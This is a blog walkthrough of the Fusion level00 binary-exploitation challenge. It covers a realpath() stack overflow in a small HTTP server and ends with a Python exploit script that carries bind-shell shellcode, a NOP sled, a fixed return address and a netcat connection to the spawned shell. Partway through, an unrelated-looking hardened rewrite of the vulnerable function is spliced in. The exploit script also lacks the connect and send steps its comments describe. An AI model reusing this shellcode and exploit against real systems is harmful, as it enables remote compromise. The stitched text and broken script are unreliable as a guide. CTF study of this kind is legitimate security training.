Exploit Exercise Binary Exploitation Fusion level 00

Posted by Suraj Singh on August 31, 2018 · 11 mins read
Hi readers,

Welcome again to the Bitforestinfo blog. Today's post is really going to be interesting, because I am going to share my walkthrough of the Exploit Exercises Fusion level 00 challenge.
So, let's start.


This is a simple introduction to get you warmed up. 
The return address is supplied in case your memory needs a jog :)

Hint: Storing your shellcode inside of the fix_path ‘resolved’ buffer might be a
bad idea due to character restrictions due to realpath(). Instead, there is
plenty of room after the HTTP/1.1 that you can use that will be ideal (and much larger).

Source Code

#include "../common/common.c"

int fix_path(char *path)
{
  char resolved[128];

  if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
  strcpy(path, resolved);
}

char *parse_http_request()
{
  char buffer[1024];
  char *path;
  char *q;

  printf("[debug] buffer is at 0x%08x :-)\n", buffer);

  if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
  if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");

  path = &buffer[4];
  q = strchr(path, ' ');
  if(! q) errx(0, "No protocol version specified");
  *q++ = 0;
  if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");

  fix_path(path);

  printf("trying to access %s\n", path);

  return path;
}

int main(int argc, char **argv, char **envp)
{
  int fd;
  char *p;

  background_process(NAME, UID, GID);
  fd = serve_forever(PORT);
  /* the listing in the post ends here; the last two lines are from the level00 source */
  set_io(fd);

  parse_http_request();
}


Source Code Description

After staring at this code for a few minutes, it was clear to me that it is a small server that processes a user-supplied HTTP request. Once started, it waits for a new connection; when one arrives, parse_http_request() runs, and at the end of that routine fix_path() is called on the requested path. Having understood the program's behaviour, I started looking for vulnerable code and function calls.

Vulnerable codes

Set 1 [not sure]:

path = &buffer[4];
q = strchr(path, ' ');
if(! q) errx(0, "No protocol version specified");
*q++ = 0; // <---- maybe usable for another method?

Set 2 [completely sure]:

if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
strcpy(path, resolved);

Yes, both of these looked suspicious to me at first sight, but before going further the vulnerability had to be confirmed. After a few tests and some gdb analysis, I confirmed that the second set is vulnerable.

realpath() is the vulnerable call: it writes the canonical path, which can be up to PATH_MAX bytes long, into resolved, but resolved is only 128 bytes, so a long enough path overflows that stack buffer.

Testing Code

fusion@fusion:~$ cat try.c
#include <stdio.h>
#include <stdlib.h>   // realpath()
#include <string.h>

int main(){
    char resolve[150];

    // realpath() fails for a path that does not exist, but by then glibc has
    // usually already written the partially resolved path into resolve,
    // which is what the printf below shows
    if (realpath(" HTTP/1.1 aaaaaaaaaaa", resolve) == NULL){
        printf("Fail %s\n", resolve);
        return 0;
    }
    printf("OK %s\n", resolve);
    return 0;
}

I leave the analysis of this test program to the reader, because it is really simple; a few minutes are enough to understand it completely. Just compile and run it. Hint: buffer overflow.

After a few changes to the test program I got the error below.
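As an added example (not the challenge's source and not the post's own code), here is the same fix_path() and request parsing rewritten the way a defender would fix them: resolved gets the PATH_MAX size that realpath() actually requires, and the copy back into the request buffer is checked against the room that is really left, so an oversized canonical path is refused instead of written past the end of the buffer. The function and status names, and the request lines it is run on, are my own constructions; it parses an in-memory request line rather than reading from a socket.

```c
/* Added example, not the challenge's or the post's own code: level00's
 * fix_path() and parse_http_request() rewritten with bounds checks.
 * realpath() writes up to PATH_MAX bytes into its second argument, so the
 * original 128-byte `resolved` array is too small; here `resolved` has the
 * size realpath() requires, and the copy back into the request buffer is
 * checked against the room that is really left. All names are constructed. */
#define _XOPEN_SOURCE 700   /* declares realpath() and PATH_MAX on glibc */
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifndef PATH_MAX
#define PATH_MAX 4096
#endif

enum req_status {
    REQ_OK = 0,
    REQ_NOT_GET,        /* request line does not start with "GET " */
    REQ_NO_VERSION,     /* no space after the path */
    REQ_BAD_PROTOCOL,   /* version is not HTTP/1.1 */
    REQ_NO_PATH,        /* realpath() failed: ENOENT, EACCES, ENAMETOOLONG, ... */
    REQ_PATH_TOO_LONG   /* canonical path would not fit back into the buffer */
};

/* Hardened fix_path(): `path_cap` is the number of bytes available at
 * `path`, so an oversized result is refused instead of overflowing. */
int fix_path_safe(char *path, size_t path_cap)
{
    char resolved[PATH_MAX];        /* what realpath() assumes; level00 used 128 */

    if (realpath(path, resolved) == NULL)
        return REQ_NO_PATH;

    size_t n = strlen(resolved);
    if (n + 1 > path_cap)           /* +1 for the terminating NUL */
        return REQ_PATH_TOO_LONG;

    memcpy(path, resolved, n + 1);
    return REQ_OK;
}

/* Hardened parse_http_request(): parses an in-memory request line instead
 * of reading fd 0, NUL-terminates the buffer, and hands fix_path_safe()
 * the capacity that remains after the path's offset. On success
 * *out_path points into `buffer` at the canonical path. */
int parse_request_line(const char *req, size_t req_len,
                       char *buffer, size_t buf_cap, char **out_path)
{
    *out_path = NULL;
    if (req_len >= buf_cap)         /* always keep room for the NUL */
        req_len = buf_cap - 1;
    memcpy(buffer, req, req_len);
    buffer[req_len] = '\0';

    if (strncmp(buffer, "GET ", 4) != 0)
        return REQ_NOT_GET;

    char *path = buffer + 4;
    char *q = strchr(path, ' ');
    if (q == NULL)
        return REQ_NO_VERSION;
    *q++ = '\0';
    if (strncmp(q, "HTTP/1.1", 8) != 0)
        return REQ_BAD_PROTOCOL;

    /* Once the version has been checked, everything from `path` to the end
     * of `buffer` may be overwritten by the canonical path. */
    int rc = fix_path_safe(path, buf_cap - (size_t)(path - buffer));
    if (rc != REQ_OK)
        return rc;

    *out_path = path;
    return REQ_OK;
}

/* Status of `req` parsed in a fresh 1024-byte buffer (level00's size). */
int request_status(const char *req)
{
    char buffer[1024];
    char *path;
    return parse_request_line(req, strlen(req), buffer, sizeof buffer, &path);
}

/* 1 when `req` is accepted and its canonical path equals `expected`. */
int request_resolves_to(const char *req, const char *expected)
{
    char buffer[1024];
    char *path;
    int rc = parse_request_line(req, strlen(req), buffer, sizeof buffer, &path);
    return rc == REQ_OK && strcmp(path, expected) == 0;
}

/* A buffer with almost no room left: "/.." resolves to "/", which needs
 * two bytes, so the copy is refused rather than written past the end. */
int too_long_demo(void)
{
    char path[4] = "/..";
    return fix_path_safe(path, 1);
}

int main(void)
{
    /* Constructed request lines in the shape level00 expects. */
    const char *reqs[] = {
        "GET /../ HTTP/1.1\r\n",
        "GET /CONSTRUCTED/does/not/exist HTTP/1.1\r\n",
        "POST / HTTP/1.1\r\n",
        "GET /\r\n",
        "GET / HTTP/1.0\r\n",
    };
    for (size_t i = 0; i < sizeof reqs / sizeof reqs[0]; i++)
        printf("status %d for %s", request_status(reqs[i]), reqs[i]);
    printf("too-long copy refused: %d\n", too_long_demo() == REQ_PATH_TOO_LONG);
    return 0;
}
```

Compile with cc -std=c99 and run it. "/../" canonicalises to "/" on any Unix, a nonexistent path is reported as REQ_NO_PATH rather than left half-resolved in the buffer, and too_long_demo() shows the capacity check that level00's fix_path() lacks. The two deliberate behaviour differences from the original are the PATH_MAX-sized resolved array and the refusal to copy when the canonical path does not fit.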

GDB Output

Program received signal SIGSEGV, Segmentation fault.
0xcccccccc in ?? ()
(gdb) i r
eax 0x1 1
ecx 0xb7e568d0 -1209702192
edx 0xbffffa45 -1073743291
ebx 0xb7fceff4 -1208160268
esp 0xbffff8e0 0xbffff8e0
ebp 0xcccccccc 0xcccccccc
esi 0xbffffaf9 -1073743111
edi 0x8049f05 134520581
eip 0xcccccccc 0xcccccccc
eflags 0x10246 [ PF ZF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51


Now solving the challenge is a piece of cake, because we have confirmed the vulnerability and all of the binary's security features are off. So, here is my exploit code.


# import modules
import socket
import struct
import os

# target configurations
TARGET_IP = raw_input("[*] Insert Machine Address [Default:] : ") or ''

# Create Socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Creating Socket ..."

# Socket File
sf = s.makefile('rb')

# Connect To Target

ebp = sf.read(len('[debug] buffer is at 0xbffff8f8 :-)\n'))
print ebp
ebp = ebp[ebp.find('0x'):-5]

print "[+] Generating payload..."
payload = ''
payload+= 'GET '

# generated From Msfvenom
# msfvenom -p linux/x86/shell_bind_tcp
buf = ""
buf += '\x90'*120 # NOP Sleds
buf += '\x31\xC9\x31\xD2\x31\xC0\x31\xDB' # xor [eax, ebx, ecx, edx]
buf += "\xda\xcd\xb8\xbe\xd0\x1b\x82\xd9\x74\x24\xf4\x5b\x29"
buf += "\xc9\xb1\x14\x31\x43\x19\x83\xc3\x04\x03\x43\x15\x5c"
buf += "\x25\x2a\x59\x57\x25\x1e\x1e\xc4\xc0\xa3\x29\x0b\xa4"
buf += "\xc2\xe4\x4b\x9e\x54\xa5\x23\x23\x69\x58\xef\x49\x79"
buf += "\x0b\x5f\x07\x98\xc1\x39\x4f\x96\x96\x4c\x2e\x2c\x24"
buf += "\x4a\x01\x4a\x87\xd2\x22\x23\x71\x1f\x24\xd0\x27\xf5"
buf += "\x1a\x8f\x1a\x89\x2c\x56\x5d\xe1\x81\x87\xee\x99\xb5"
buf += "\xf8\x72\x30\x28\x8e\x90\x92\xe7\x19\xb7\xa2\x03\xd7"
buf += "\xb8"
print "[+] Payload ready to dispatch."

# Trying To Find Offset
# 500 Words
# payload+= 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq'

# Offset 139
print "[+] Assemble Payload"
payload+= '\x90'*135 # Nop Sled
payload+= 'b'*4 #struct.pack("I", 0xbffff8f8) # struct.pack("I", int(ebp)) # EBP
payload+= struct.pack("I", 0xbffff8dc+10) # 'aaaa' # this point is countering
payload+= buf
# Instruction Pointer ---|
payload+= '\x90'*(1000-(143+len(buf))) # Nop Sled <---|
payload+= ' HTTP/1.1\r\n'

print "[+] Payload Sent"
# Sending Payload

print "[+] Wait For Response"
print [sf.read(len('trying to access %s\n')+10)]
print "[-] If You Are Reading This Message Then Probably Exploit failed."
raw_input("[-] Exit. Trying Again..")  # raw_input: Python 2's input() would eval the line
print "[+] Starting Bind TCP Shell."
print "[+] Use Commands Carefully."
os.system('nc {} 4444'.format(TARGET_IP))

Yeah! We won.

Feel free to comment below with any points you appreciated. Hahaha!